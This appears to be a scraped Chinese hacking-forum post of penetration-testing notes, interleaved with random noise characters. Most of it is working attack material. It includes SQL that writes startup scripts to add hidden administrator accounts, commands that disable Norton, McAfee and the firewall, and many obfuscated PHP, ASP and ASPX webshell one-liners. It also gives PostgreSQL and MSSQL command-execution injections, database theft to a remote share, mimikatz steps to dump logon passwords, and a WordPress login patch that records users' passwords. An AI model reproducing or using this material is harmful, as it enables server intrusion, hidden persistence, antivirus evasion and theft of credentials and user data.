* u" h* |2 }5 d, Winsert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );
; m. m1 k* ?1 A# hinsert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );# L3 {+ e: N& N
select * from a into outfile "C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\\启动\\a.vbs";/ S! U3 S% s" s# K/ g/ m5 B1 D
drop table a;
% L" Z, g7 E6 B0 ~0 g4 Y4 R9 [# u5 X) W) \* V. F$ q6 Y1 `: R
英文版本:
; h3 [/ `# k, `0 m
# z4 S0 ?) {2 R( A: Z7 |use test;
- O* b/ @' v% }" acreate table a (cmd text);
9 C! c7 M3 G) H3 _2 |insert into a values ("set wshshell=createobject (""wscript.shell"") " );/ Q; ~8 x5 g. L9 [
insert into a values ("a=wshshell.run (""cmd.exe /c net user test 123!@#abcABC /add"",0) " );& Y1 u* t+ I$ {% ]
insert into a values ("b=wshshell.run (""cmd.exe /c net localgroup administrators test /add"",0) " );- c. H& c/ l, @8 f: v
select * from a into outfile "C:\\Documents and Settings\\All Users\\Start Menu\\Programs\\Startup\\a.vbs";
/ S: U6 f+ K& f1 i- Y2 pdrop table a;
/ g% k; q) T$ @8 v6 e- Z& _# y( x! F B2 F4 A& W
create table a (cmd BLOB);
7 i: B, ^$ @( t+ iinsert into a values (CONVERT(木马的16进制代码,CHAR));/ x( p/ }1 Z! s: d
select * from a into dumpfile 'C:\\Documents and Settings\\All Users\\「开始」菜单\\程序\启动\\mm.exe'
7 u* J* `4 O) {8 Zdrop table a;
. S: s! z6 Z; X: T# B1 Z) R# {2 w$ s6 P% O9 [3 i4 l
记录一下怎么处理变态诺顿# N" l+ p- ^, L# z; Q
查看诺顿服务的路径( d* P* Z+ p" D5 T x1 v R
sc qc ccSetMgr
; A+ N c5 o$ R9 a然后设置权限拒绝访问。做绝一点。。
2 \2 O, a! s6 V3 F8 Ycacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d system' Z+ H2 K& N6 R2 x
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d "CREATOR OWNER"! q4 @$ j7 k7 F' f5 ~+ O, r0 c
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d administrators
}! W5 f! L1 V% Tcacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /d everyone0 s7 U; k W1 j( r8 R1 G6 z
0 d5 `* k% e3 Z/ H
然后再重启服务器. ?6 }! n d: w1 s: o7 x |' d; l3 ]
iisreset /reboot! _) ]. z, j* N: H; e
这样就搞定了。。不过完事后。记得恢复权限。。。。6 H* X. H3 U1 \0 u( e9 n
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G system:F% i0 C8 G4 \& K9 _5 F: g
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G "CREATOR OWNER":F- j8 P H* l/ [ \! e3 p; K
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G administrators:F1 b/ l8 b- j/ o2 R3 s% z( N
cacls "C:\Program Files (x86)\Common Files\Symantec Shared" /t /e /G everyone:F- ]$ }1 m" c! t: B6 @4 e
SELECT '<%eval(request(chr(35)))%>' into [fuck] in 'E:\asp.asp;fuck.xls' 'EXCEL 4.0;' from admin/ {) C b i( V- O5 j/ I" e4 ~8 s
( j# T: @. q x+ Y B4 M CEXEC('ma'+'ster..x'+'p_cm'+'dsh'+'ell ''net user''')% ~) P9 X5 w4 L9 n" x; e
* ^4 E, I7 c+ L6 O6 s0 X; s) d- z; [postgresql注射的一些东西
% n9 Z: p0 K/ I如何获得webshell4 Q* d1 @' {9 Y$ o% N1 [
http://127.0.0.1/postgresql.php?id=1;create%20table%20fuck(shit%20text%20not%20null); & j- t. ^3 {! }/ K
http://127.0.0.1/postgresql.php?id=1;insert into fuck values($$<?php eval($_POST[cmd]);?>$$);
7 h5 r- k/ H7 g' Q( V1 o( n# bhttp://127.0.0.1/postgresql.php?id=1;copy%20fuck(shit)%20to%20$$/tmp/test.php$$;4 K: ^* u9 h' ~3 `, d2 d! G8 F8 a
如何读文件
% D$ h; J1 A. c0 ?8 A/ Shttp://127.0.0.1/postgresql.php?id=1;create table myfile (input TEXT);
- x" M$ R: d; N4 J% x8 Phttp://127.0.0.1/postgresql.php?id=1;copy myfile from ‘/etc/passwd’;
: s6 d# ]: E* _9 {+ s2 \, mhttp://127.0.0.1/postgresql.php?id=1;select * from myfile;
, Q* [4 W; h. y& w7 y
% d5 ?! Q3 U% Z4 z4 a8 n/ L. Rz执行命令有两种方式,一种是需要自定义的lic函数支持,一种是用pl/python支持的。
. L' |8 j b: ]8 t当然,这些的postgresql的数据库版本必须大于8.X& F7 w1 F+ F% P: E/ y+ a7 l! b3 E
创建一个system的函数:
% J# h% E, C$ |- x0 z1 X0 |- ECREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6', 'system' LANGUAGE 'C' STRICT
* J; l N+ }- ]6 B' c6 G" |' f6 Z& z9 {7 C2 b* D
创建一个输出表:
, ]! }- O# A4 J: ^1 c9 M, RCREATE TABLE stdout(id serial, system_out text): C2 ?# E! c$ z- W' i
4 ~+ E/ K! @- B5 E" o
执行shell,输出到输出表内:
/ {* _5 G R+ |- p9 q; }+ g ?) a6 L8 lSELECT system('uname -a > /tmp/test')# _- n9 q/ C- I) J2 o
- t5 [1 w+ J& n& b- `copy 输出的内容到表里面;
) d/ @0 T1 K$ H7 q. U9 E) Q" pCOPY stdout(system_out) FROM '/tmp/test'' `/ ~" z7 o% ^
/ L' \2 y* G" |- ?7 W: ^
从输出表内读取执行后的回显,判断是否执行成功, e/ F8 y/ B6 n* v6 m( Y
. s& H" \7 W% [) i) jSELECT system_out FROM stdout
2 c# A0 l2 w+ l6 n) R下面是测试例子: e- ?- I9 l+ u7 { T! F" k9 {
* _; ~% _7 U/ p; R/store.php?id=1; CREATE TABLE stdout(id serial, system_out text) --
; u* T) ~+ N$ b' P' l) S8 d
: W! n7 d8 `4 t" u/store.php?id=1; CREATE FUNCTION system(cstring) RETURNS int AS '/lib/libc.so.6','system' LANGUAGE 'C'6 |6 d; V6 g- h. g
STRICT --
7 R7 s6 i" @8 n) A8 K- U4 V
6 n7 Z( a, {6 d z4 A- G/store.php?id=1; SELECT system('uname -a > /tmp/test') --
. i* H+ K& D( |2 F; L; @: p1 g( l) w0 r; p( J. Z W( n) F
/store.php?id=1; COPY stdout(system_out) FROM '/tmp/test' --) F- D1 K2 s5 w
1 u( T- z0 g' I% |% a8 f) r2 q/store.php?id=1 UNION ALL SELECT NULL,(SELECT stdout FROM system_out ORDER BY id DESC),NULL LIMIT 1 OFFSET 1--, ]: `4 N8 f, R1 ~2 [( r0 F
net stop sharedaccess stop the default firewall
* X# s x" ?, S2 g8 ~7 T p% w* I; inetsh firewall show show/config default firewall( G6 ` m0 O& g; J2 x
netsh firewall set notifications disable disable the notify when the program is disabled by the default firewall9 k3 w; X0 [: h
netsh firewall add allowedprogram c:\1.exe Svchost add the program which is allowed by default firewall
$ ?% J* T3 i& j- A- z) m' o( O修改3389端口方法(修改后不易被扫出)% @6 z9 T8 Q3 }# E2 _9 b
修改服务器端的端口设置,注册表有2个地方需要修改
6 R7 {# `4 [* }5 ~ u D* h& q7 h6 B4 l, l$ _, Z) U3 q2 a
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\TerminalServer\\Wds\\rdpwd\\Tds\\tcp]
0 ]2 ]9 x" @8 cPortNumber值,默认是3389,修改成所希望的端口,比如6000. M% q# U# Q B& z
5 N: T: L+ o; E9 C' r
第二个地方:# q9 O/ s3 X2 l, S) W
[HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\WinStations\\RDP-Tcp] $ a# e6 C& k) K& z
PortNumber值,默认是3389,修改成所希望的端口,比如60001 L/ q* w7 L" i1 D* {/ v
9 R7 M8 |% R; v现在这样就可以了。重启系统就可以了
b. ?# C. u3 {3 m& U' U& t. i! K; P; a, y
查看3389远程登录的脚本
$ W7 L8 G2 c% ~1 P/ d. V保存为一个bat文件+ R9 q3 n E5 \2 [& B0 Z4 u
date /t >>D:\sec\TSlog\ts.log
6 M! s: S5 `! \time /t >>D:\sec\TSlog\ts.log4 V7 M6 v2 Q1 a& S3 G, S* r
netstat -n -p tcp | find ":3389">>D:\sec\TSlog\ts.log
6 I; U% b) I- L& X! M6 Jstart Explorer. K* ]8 B; R( r$ n! }8 r
- d6 z* E% T w+ [2 H/ m! M( lmstsc的参数:
4 p; |/ z3 N- Z2 Q- v" [3 g2 v
远程桌面连接
2 W1 p1 f* A/ ?0 L3 E% M5 ]1 B
1 B; Q! O- E7 \, w/ c8 Q: gMSTSC [<Connection File>] [/v:<server[:port]>] [/console] [/f[ullscreen]]- G2 t1 U z% x2 b
[/w:<width> /h:<height>] | /Edit"ConnectionFile" | /Migrate | /?
) Q. v5 ^7 T# \/ k' L0 H- M5 ?1 d. X8 o
<Connection File> -- 指定连接的 .rdp 文件的名称。
# V7 E# Y( w" g2 V& n; J4 N5 [2 }% e, u
/v:<server[:port]> -- 指定要连接到的终端服务器。
8 w4 J3 D! ?* i2 Y* ]" ?6 { V+ y8 `2 Y
/console -- 连接到服务器的控制台会话。: `: I7 L3 ]$ W/ a {+ j, H3 r5 M$ H# k
# v6 r0 m, J( |% Z
/f -- 以全屏模式启动客户端。3 i$ L5 a M& `: w
3 f. R% m3 |( K6 [1 r
/w:<width> -- 指定远程桌面屏幕的宽度。
) Q* Y- _$ }6 f7 ~& O; ~2 r6 [' a
/h:<height> -- 指定远程桌面屏幕的高度。% r* E7 k) b; L2 u3 x
9 R: x2 M' l; B4 h% I: N( N9 Q. W
/edit -- 打开指定的 .rdp 文件来编辑。& d$ \( H3 Y0 Q" I3 w$ p, ~
( y% t" l/ t- K; Y& | ]- C/migrate -- 将客户端连接管理器创建的旧版
1 y0 N8 X, v* b: s连接文件迁移到新的 .rdp 连接文件。
2 X3 `8 _1 P' k' ]9 k, h: u [( H& u ]9 `6 H# ~7 C% o: ], E
3 a ]/ _8 y% L. r2 K1 h. Y5 l* U! D其中mstsc /console连接的是session 0,而mstsc是另外打开一个虚拟的session,这样的话就是相当与另外登陆计算机。也就是说带console参数连接的是显示器显示的桌面。大家可以试试啊,有的时候用得着的,特别是一些软件就% d/ n$ |* c3 ~ \2 z" P
mstsc /console /v:124.42.126.xxx 突破终端访问限制数量' j; l6 d/ K% B$ N( W# e5 I
9 J+ @! H! m- k7 n' z/ S* Y" y; c T1 ^
命令行下开启33891 l/ U& }1 q" f: z9 X2 Q
net user asp.net aspnet /add
3 G( p( p4 [( l. l, W1 h3 Knet localgroup Administrators asp.net /add
7 U0 K$ B2 F q7 ^' p+ `2 h4 Tnet localgroup "Remote Desktop Users" asp.net /add
9 z( t- Q3 {0 ^attrib +h "%SYSTEMDRIVE%\Documents and Settings\asp.net" /S /D
- E* R& z/ s# K. r# L7 E' F4 C$ Pecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t reg_dword /d 0
1 o7 ^2 p- L( P& I5 n& e8 O' Mecho Y | reg add "HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server" /v AllowTSConnections /t reg_dword /d 1& z+ D6 I; f8 Y0 l
echo Y | reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "asp.net" /t REG_DWORD /d 00000000 /f' t# A( m- v5 u+ \4 l
sc config rasman start= auto' k1 L1 n# [5 x
sc config remoteaccess start= auto% f/ r" g+ r, _$ f7 M- j- V
net start rasman/ O! P; W2 A$ [5 Z' B
net start remoteaccess* y$ z6 b' U/ u
Media5 b4 m" p" Y6 a* }
<form id="frmUpload" enctype="multipart/form-data"% h! N& a6 X$ }7 Z
action="http://www.site.com/FCKeditor/editor/filemanager/upload/php/upload.php?Type=Media" method="post">Upload a new file:<br>
1 P( b A2 h. n/ F6 y* F/ Q<input type="file" name="NewFile" size="50"><br>
9 E' @* R1 C8 @% @% n, ~+ J<input id="btnUpload" type="submit" value="Upload">' u+ O7 h. V$ C$ ~7 L
</form># F1 N6 h$ z3 S
, \. e% E6 K" i5 w- c% k: ~control userpasswords2 查看用户的密码
, H% b; x3 e" l- Vaccess数据库直接导出为shell,前提a表在access中存在。知道网站的真实路径
7 Y2 y/ E2 t+ r. pSELECT '<%execute request("a")%>' into [a] in 'c:\x.asp;a.xls' 'excel 8.0;' from a8 B) j9 ?! \* f) F
2 A5 e0 ]( [5 C V$ f" h
141、平时手工MSSQL注入的时候如果不能反弹写入,那么大多数都是把记录一条一条读出来,这样太累了,这里给出1条语句能读出所有数据:
6 A0 S, t8 G4 K! U8 j0 o) p测试1:8 y( x/ a+ R0 A5 Z+ ^ m6 ^" D
SELECT top 1 name=STUFF((SELECT ','+[name] FROM sysobjects t where xtype='U' FOR XML PATH('')), 1, 1, '') FROM sysobjects t1) ?+ D. I/ T( U
* g5 \2 Q1 U; K5 j' l
测试2:
( Z4 E" M7 f# B8 ]& t* H8 K* @; k/ ^: S, P7 q) b7 v+ \; R' c
create table dirs(paths varchar(100),paths1 varchar(100), id int)& h4 M* z( W, U! c8 I8 m
# B* p2 y; m: k: W6 [2 P" `
delete dirs;insert dirs exec master.dbo.xp_dirtree 'c:\',1,1--
& H) x! K0 W0 y8 J/ t! H m4 Q B) s3 b3 ~3 f4 L
SELECT top 1 paths=STUFF((SELECT ','+[paths] FROM dirs FOR XML PATH('')), 1, 1, '') FROM dirs t1* F8 O% J, _$ F7 g( E9 X- d
关闭macfee软件的方法://需要system权限,请使用at或psexec –s cmd.exe命令
, o# d, n) q9 K' @9 x2 G; @可以上传.com类型的文件,如nc.com来绕过macfee可执行限制;
6 E" B6 C2 W fnet stop mcafeeframework, I( y& F0 K4 U# P
net stop mcshield
W/ m9 b! O; d$ Hnet stop mcafeeengineservice
( L, |! |) y; s9 C5 bnet stop mctaskmanager) Q! H2 J& G" k! y
http://www.antian365.com/forum.p ... DU5Nzl8NDY5Mw%3D%3D
6 E8 {+ }+ f& Y$ Z) N% F {
6 T4 U" s0 {+ N, S$ C! E% [' b VNCDump.zip (4.76 KB, 下载次数: 1) 4 W ^8 }9 G0 J/ y3 B( I
密码在线破解http://tools88.com/safe/vnc.php
! k! L0 l2 I7 ]1 g% NVNC密码可以通过vncdump 直接获取,通过dos查询[HKEY_LOCAL_MACHINE\SOFTWARE\RealVNC\WinVNC4] 下的Password也可以获取1 X4 F, D- A9 u4 f/ ~
7 C& v3 W! k) `# p$ a: ^. B
exec master..xp_cmdshell 'net user'
6 Z( B, I, F# p1 `, y9 I& Imssql执行命令。, H2 n) s; B* L, `) V" y
获取mssql的密码hash查询. `# B/ ~7 e* u4 f7 H1 _% ~
select name,password from master.dbo.sysxlogins( f6 {" W0 b2 P+ p2 n+ N6 ~2 X/ F# b
4 L6 f0 M+ x9 z# T9 zbackup log dbName with NO_LOG;
) a) K/ o: p; E; C- y9 }9 Abackup log dbName with TRUNCATE_ONLY;
: o3 N3 E8 }0 W) @' R+ FDBCC SHRINKDATABASE(dbName);! R* ^2 `3 Z4 E% Y( Y+ r; i3 h) \3 s
mssql数据库压缩
: k! W y; \! J
3 t j3 }" t1 a' HRar.exe a -ep1 -m0 -v200m E:\web\1.rar E:\webbackup\game_db_201107170400.BAK
/ Q' O$ X7 w6 g1 s" K' W将game_db_201107170400.BAK文件压缩为1.rar,大小为200M的分卷文件。2 P) @8 \5 r$ |! O* l4 z
# u$ p/ T. c2 R; O0 e) A7 I) r
backup database game to disk='D:\WebSites\game.com\UpFileList\game.bak'
- d* {8 u' u) |; m& [7 U备份game数据库为game.bak,路径为D:\WebSites\game.com\UpFileList\game.bak
8 u8 Y3 Z j4 e& A/ S. N2 G, _6 e/ S( D# z( m
Discuz!nt35渗透要点:! ^; E: T- b2 r" Y) C4 L7 M
(1)访问 网站地址/admin/global/global_templatesedit.aspx?path=../tools/&filename=rss.aspx&templateid=1&templatename=Default: X' I& |8 c2 X' P- R3 o# Y* x
(2)打开rss.aspx文件,将<%@ Page Inherits="Discuz.Web.UI.RssPage" %>复制到本地备份,然后替换其为<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>
2 J& ^* s, N% @. f, P. b2 L(3)保存。3 n& ~# }- R% s9 ]1 e8 H: ^
(4)一句话后门地址http://somesite.com.cn/tools/rss.aspx 密码为pass
+ h1 O& P+ I B7 rd:\rar.exe a -r d:\1.rar d:\website\
" ?7 \4 C: G( `* ]7 P递归压缩website
: Y' ]4 {1 B* I3 i注意rar.exe的路径
# G4 J7 _0 i* e2 v5 ~8 S
, s R z& H1 s, R<?php2 ^* R8 _( g r7 f1 w
2 A7 ~& D2 G4 ]+ J) w3 j$telok = "0${@eval($_POST[xxoo])}";
3 p$ E* x- t2 I9 f1 i, x) O& x& R! _3 g7 r6 v6 A
$username = "123456";
( z% J9 h! k' e; V: O* z7 _2 I) |7 o7 j1 {' Z, Y6 U
$userpwd = "123456";5 t3 N/ `: c# _' R" o9 {/ D
9 U) a3 A5 W8 j* }$telhao = "123456";8 r! c( W: ?, }2 q2 v2 g) Z
( ^4 N+ I2 `+ r" n$ Y
$telinfo = "123456";
/ K2 o$ k, C* F) N: j( M7 t, C1 ^! \! a, O1 m' G4 e9 A0 _* r
?>
+ w, h3 q- |3 A' E0 c! E) F2 fphp一句话未过滤插入一句话木马
: `+ L( Q$ |6 T% g7 A6 {
3 \2 s) ^% O4 [9 O7 A: r站库分离脱裤技巧7 p0 D% |* F" @2 V* ~
exec master..xp_cmdshell 'net use \\xx.xx.xx.xx\d$\test "pass" /user:"user"'+ C' ^+ `. \3 v! Z$ I) A+ Q, G
exec master..xp_cmdshell 'bcp test.dbo.test out \\xx.xx.xx.xx\d$\test\1.txt -c -Slocalhost -Uuser -Ppass'
* B: }5 F+ `5 Z8 ]9 n4 h条件限制写不了大马,只有一个一句话,其实要实现什么完全够了,只是很不直观方便啊,比如tuo库。
# `5 e" @, E- b这儿利用的是马儿的专家模式(自己写代码)。! A( |. M, H% z9 s8 C
ini_set('display_errors', 1);
4 S* A8 b) L0 Xset_time_limit(0);
0 T# ^9 W( _8 G0 ~% x1 s2 Zerror_reporting(E_ALL); R1 q3 b) x) q, T6 Y% p) B8 h
$connx = mysql_connect(":/var/tmp/mysql.sock", "forum", "xx!!xx3") or die("Could not connect: " . mysql_error());* B% |# P: T+ n0 t+ B
mysql_select_db("discuz",$connx) or die("Could not connect: " . mysql_error());1 D% `& c1 Q+ e
$result = mysql_query("Select * FROM members",$connx) or die("Could not connect: " . mysql_error());2 R( ^8 G) K) W% y8 F
$i = 0;- M, E) Q4 |3 X
$tmp = '';
) M6 W, K1 }6 J% F' L: qwhile ($row = mysql_fetch_array($result, MYSQL_NUM)) {
3 L( q. G" Z; p9 [; P9 u; M" e! } $i = $i+1;: _# ~" E+ ^6 | ] r, O
$tmp .= implode("::", $row)."\n";
9 Y1 T3 K3 c1 X" z# H$ z: J' t if(!($i%500)){//500条写入一个文件
8 u4 D8 Z$ V1 d2 P- v! A) t $filename = '/home/httpd/bbs.xxxxx/forumdata/cache/user'.intval($i/500).'.txt';
3 V$ [( M0 b5 F/ A. E file_put_contents($filename,$tmp);2 U8 h) w2 p+ y) p
$tmp = '';
6 N' ]" @1 P) X+ C h- Y7 g8 J/ O% w }6 b/ J+ z+ q6 x0 @ p" e7 G% q
}
% w8 m$ |% {, @9 Q7 i B* Wmysql_free_result($result);
" i- H% X+ A& i% ]) Q# q
% V, j6 M5 Q( b4 ~7 U- U/ D0 p' N9 }: `" z7 Y$ V+ D! I
: I3 i# d2 E8 ^* u |4 [
//down完后delete
( p7 s) D( o% A$ |$ q, G
/ o( u; X! L" U: v: B3 C7 a% e& U# z. j8 d, D0 M
ini_set('display_errors', 1);( w/ F$ B4 _; E7 q6 v
error_reporting(E_ALL);
$ _$ o( X% o/ ]0 Q$i = 0;/ N% q- l W: g |& V( Z2 j
while($i<32) {6 W m8 Y$ F2 m4 s' K: Y
$i = $i+1;
, v6 }8 W5 l: R! o1 i $filename = '/home/httpd/bbs.xxxx/forumdata/cache/user'.$i.'.txt';7 j% C+ {4 d8 S* U
unlink($filename);3 \; B. m1 n1 T, z; _7 x
}
- L! j: W: r) C- L. `httprint 收集操作系统指纹
( ?9 Y# I7 P' n扫描192.168.1.100的所有端口) l; O* } M* s- Q! l' h9 x! b5 t
nmap –PN –sT –sV –p0-65535 192.168.1.100: D- `7 ]* ^! G' |3 m# I
host -t ns www.owasp.org 识别的名称服务器,获取dns信息
* y$ [9 _ O3 M& K1 ]host -l www.owasp.org ns1.secure.net 可以尝试请求用于owasp.org的区域传输
8 K" T$ g" e9 A- ?Netcraft的DNS搜索服务,地址http://searchdns.netcraft.com/?host
8 ^) I7 N; c; t$ [* n0 j0 S) Q$ J' p
Domain tools reverse IP: http://www.domaintools.com/reverse-ip/ (需要免费注册)
$ u7 a3 s4 g0 d0 w% H+ ^2 K! A/ ~! O) ~" Z
MSN search: http://search.msn.com 语法: "ip:x.x.x.x" (没有引号)) b, x6 I2 c6 X
# }- o% U; l: [/ o
Webhosting info: http://whois.webhosting.info/ 语法: http://whois.webhosting.info/x.x.x.x
/ P8 v2 j1 r$ G- w4 S7 Q- ~% T) c2 X2 _3 I1 Q v! F; L4 G! x. w/ H
DNSstuff: http://www.dnsstuff.com/ (有多种服务可用)
9 u: f( R# m4 O
' c$ z1 H( ]' L" E$ }* O H7 i* A http://net-square.com/msnpawn/index.shtml (要求安装)
m H# V6 P( Q; G, N1 q; A% W" U% Z _9 R6 _3 T4 Q% g1 G
tomDNS: http://www.tomdns.net/ (一些服务仍然是非公开的)+ `9 t- _( {+ M% k# v, O; K
6 Z# v" Q7 i, {
SEOlogs.com: http://www.seologs.com/ip-domains.html (反向IP/域名查找)9 u z- e& X8 J* _
set names gb23120 J+ \% @4 N& g5 V" Z
导入数据库显示“Data too long for column 'username' at row 1”错误。原因是不支持中文。
2 }- x/ t* c. F& R3 {, [* G/ C6 a* S. R7 H
mysql 密码修改1 M5 [ E9 K* k5 A, O; i7 m
UPDATE mysql.user SET password=PASSWORD("newpass") whereuser="mysqladmin ”
6 a2 x) U' U- P* W' M1 Zupdate user set password=PASSWORD('antian365.com') where user='root';
( U5 c: ?- ~9 A0 wflush privileges;
7 w- a6 M/ ]" ^: P0 C$ L/ @% b高级的PHP一句话木马后门0 b' s9 @. h8 R+ @! y, B9 X/ i+ h, ?
; p2 F4 a7 F5 P/ F3 O
入侵过程发现很多高级的PHP一句话木马。记录下来,以后可以根据关键字查杀" l) C) z7 J% {& H# @
1 v+ X& N" ^( d1、7 Q6 i. R' N: x. r# P( W% [- B
; z& H2 b; i4 p. X3 V7 L- H1 `; m' B$hh = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";
8 r d' V/ U# |4 @2 f4 Q
8 D9 n' l+ ]# h9 A9 K7 p$ k0 I3 N$hh("/[discuz]/e",$_POST['h'],"Access");
+ `! ^; q/ T9 v) Z: H. |. |: P( M3 L; d3 C- H
//菜刀一句话2 I# B( l$ W: k" N" ^( h
( ]( T8 X0 ~ z2 y$ ^% B# G2、
: W& F2 P2 H# k/ X6 d/ L; H% b9 _' ^1 ?1 J9 R% w
$filename=$_GET['xbid'];
% h) p9 `+ Y$ ], i- z2 T
4 k7 E) R0 ~* a5 ainclude ($filename);
5 r4 t9 m! f- a- d; j2 K' O2 D ~% Q7 ?2 x2 |8 c
//危险的include函数,直接编译任何文件为php格式运行: c6 M( G. S# o2 `
2 V8 ^# j Q9 e& ~3、
/ E/ _+ o |0 E5 i" g4 G7 y% c% M1 J
$reg="c"."o"."p"."y";
8 V3 j2 ^' ^1 j+ C+ q6 {* p; j0 b+ x4 j$ K1 b! X
$reg($_FILES[MyFile][tmp_name],$_FILES[MyFile][name]);
7 k2 p! w% M% A. V, q& X: C, a& D4 f1 r
//重命名任何文件6 Z# F% X2 I( l$ g& y) B
3 {/ U" p# X% _4 } |4、
) A) w! g- ?! t8 Z5 [
) z# g/ B: f1 w8 F; o* X9 p+ C$gzid = "p"."r"."e"."g"."_"."r"."e"."p"."l"."a"."c"."e";2 R% n. e6 N1 X
3 Q8 C& ]5 R8 p! N: E2 {9 t
$gzid("/[discuz]/e",$_POST['h'],"Access");
* ?: g( w7 {4 l0 {
! Y% o4 d9 j6 ?% q _8 f+ @//菜刀一句话
$ f+ {: U4 R( T6 I
; y7 B4 S# k& [5 u c- d# v5、include ($uid);
* d5 d' w* X t; A
8 v) N- ~4 _+ O: @! P//危险的include函数,直接编译任何文件为php格式运行,POST
$ x+ J* {6 b6 ]3 ?5 q- I: o
6 m" ?$ G) N2 Y
G1 R5 S0 b8 a4 _' f//gif插一句话* V- O3 s" {6 d/ L2 M" n9 m
6 v$ @$ P/ H' Z" F, p6、典型一句话- g/ L. ?/ q% g4 s [( ]" a
) g5 l& m: c$ {) A4 q7 ?; p p程序后门代码
3 i5 h6 e& P5 S: P0 l. ?2 [<?php eval_r($_POST[sb])?>
# V+ m$ n; d& C4 ?7 N: W* c! f4 ?程序代码0 I4 y; u, p% X5 Z" T
<?php @eval_r($_POST[sb])?>
3 k4 P/ F3 @8 V//容错代码( a4 }9 Q: `9 }( L( E4 p" |: D* y
程序代码$ T: m. |+ f8 z+ u3 r; n
<?php assert($_POST[sb]);?>
( ^$ X$ B! }5 @3 k+ ~$ ^//使用lanker一句话客户端的专家模式执行相关的php语句3 G& |2 F/ s1 I. ~/ O4 o0 n
程序代码+ e/ W* A' E# K) W. w/ e! ~6 o2 N
<?$_POST['sa']($_POST['sb']);?>. c/ G4 b& |9 a! F* V
程序代码! |1 y1 s( j! y, G: U- s" q' a
<?$_POST['sa']($_POST['sb'],$_POST['sc'])?>/ h, {/ e( U/ u3 e% y3 L
程序代码
6 E* E6 E O1 j2 z' f; M<?php1 C0 b& H' s L0 Y
@preg_replace("/[email]/e",$_POST['h'],"error");' i1 Q x) x% |- i
?>
, a M5 N+ X4 `4 I: s8 O* p# B//使用这个后,使用菜刀一句话客户端在配置连接的时候在"配置"一栏输入 X3 q! q$ h8 Q; B3 ]% a/ u* u
程序代码7 _7 t: W! H0 `5 L8 F8 C
<O>h=@eval_r($_POST[c]);</O>, M6 K( U9 x7 f$ U. P3 h; r' M% w
程序代码2 B# S {1 e& w. d% e+ @
<script language="php">@eval_r($_POST[sb])</script>+ l5 V; \" V. h
//绕过<?限制的一句话0 t5 r8 j8 p' B7 P
9 z- U V5 y r6 vhttp://blog.gentilkiwi.com/downloads/mimikatz_trunk.zip v. N- j% L( n& ~. a+ d9 m( e% S
详细用法:1 E4 v Y' y; |0 ?3 P
1、到tools目录。psexec \\127.0.0.1 cmd
6 p* p7 Y b1 V- l/ }& V5 t3 H2、执行mimikatz9 ^) }8 ]8 J; e4 m0 n1 J6 {
3、执行 privilege::debug
2 m. `6 G2 ]1 e& o+ J. ~4、执行 inject::process lsass.exe sekurlsa.dll
7 ^3 G& Y8 P$ u% T [- E8 p' u, a5、执行@getLogonPasswords
$ l! k4 s) V" b$ {! }% Y! u6、widget就是密码( |; n! O! f. b5 a( ~3 c" ^
7、exit退出,不要直接关闭否则系统会崩溃。3 E% K: K- O H5 l: B# [
5 p$ n4 c/ r" p$ u& k
http://www.monyer.com/demo/monyerjs/ js解码网站比较全面
& g7 _* Z3 M8 m; R3 K# Q% I6 X+ x6 O( k4 ^! C7 t
自动查找系统高危补丁! J' c% m' l3 O8 o9 K! r3 W
systeminfo>a.txt&(for %i in (KB2360937 KB2478960 KB2507938 KB2566454 KB2646524 KB2645640 KB2641653 KB944653 KB952004 KB971657 KB2620712 KB2393802 kb942831 KB2503665 KB2592799) do @type a.txt|@find /i "%i"||@echo %i Not Installed!)&del /f /q /a a.txt
' O0 ]. H( s8 X/ N A; \* o$ Y
+ Z: @& F2 ]2 @4 ]! r, n1 k突破安全狗的一句话aspx后门& X" o( V# q- n/ t" Z6 @: y1 o; y
<%@ Page Language="C#" ValidateRequest="false" %>
1 N1 D7 }) a' P, h4 a* @<%try{ System.Reflection.Assembly.Load(Request.BinaryRead(int.Parse(Request.Cookies["你的密码"].Value))).CreateInstance("c", true, System.Reflection.BindingFlags.Default, null, new object[] { this }, null, null); } catch { }%>0 V% t9 n! T6 I" H4 y) G7 M0 O
webshell下记录WordPress登陆密码
1 H5 | W4 @7 O0 L8 ^webshell下记录Wordpress登陆密码方便进一步社工' ]* P* |7 G6 c! x. P: j% }
在文件wp-login.php中539行处添加:/ m. b& Y9 D c% W1 a l6 ^
// log password
" e5 A' b4 E' C: J$ ]! t" [$log_user=$_POST['log'];
. u% F( R) [6 c) X3 m/ b2 {$log_pwd=$_POST['pwd'];
" n9 _0 m8 u0 \: L$log_ip=$_SERVER["REMOTE_ADDR"];
1 W1 T2 }6 ~, |( S8 m$txt=$log_user.’|’.$log_pwd.’|’.$log_ip; {1 z) t! J0 t' |/ W4 K
$txt=$txt.”\r\n”;
3 g% w6 Z, a/ `- L8 {if($log_user&&$log_pwd&&$log_ip){
2 q6 _/ W" T$ o$ d2 V$ i; ?% |) H@fwrite(fopen(‘pwd.txt’,”a+”),$txt);
+ D8 ?5 e. f; g# O. g}
X' T. {# L% @4 {. R, ~" B7 ?. C当action=login的时候会触发记录密码code,当然了你也可以在switch…case..语句中的default中写该代码。
4 C- Z N5 x# U* `! ^% D; o/ n就是搜索case ‘login’
. E/ B' K! P: P8 T在它下面直接插入即可,记录的密码生成在pwd.txt中,
